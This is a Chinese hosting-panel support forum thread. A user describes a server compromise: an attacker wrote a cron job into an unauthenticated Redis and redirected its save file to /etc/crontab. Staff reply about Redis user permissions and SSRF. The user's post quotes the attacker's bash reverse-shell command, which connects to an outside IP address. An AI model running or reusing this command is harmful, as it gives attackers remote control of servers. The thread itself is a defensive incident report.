【已解答】Redis疑惑

发现一个被攻击漏洞，2023年4月份安装的宝塔7.9.8版本，redis没有设置密码，但没有开外部端口，黑客通过宝塔面板端口修改redis的值，添加了一段mars **** root bin/sh bash -i >&/dev/tcp/8.137.10.80/4050 0>&1 键值对，然后修改redis保存路径和名字到etc/crontab 。机器就被控制。发现后关闭所有端口排查问题，只要开放宝塔端口，就会被一波带走，通过netstat查看也发现宝塔端口pyrhon3上有国外ip连接。

宝塔技术-小强 · 发表于 2023-11-3 11:28:41

redis 启动的账户为redis 是没有权限写入到/etc/crontab 中的。

你的redis 是启动的用户是否为root 。

修改redis 的值的方式可以有很多，例如网站存在ssrf 漏洞是可以修改redis 的内容的

宝塔用户_aoagjp · 发表于 2023-11-3 11:37:57

好的，这边加您的QQ询问一下呢

█菠萝云买2送1活动！16G内存99元	cncsz专注海外服务器+站群	A3招租，联系qq394030111	✅易探云·香港/美国vps仅9元	【UStat】免费易用的网站分析平台
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	香港站群金牌Gold 6138大促销	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
✅出海专用服务器防封/安全	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	恒爱云-香港弹性云8H8G10M 63元	【UStat】免费易用的网站分析平台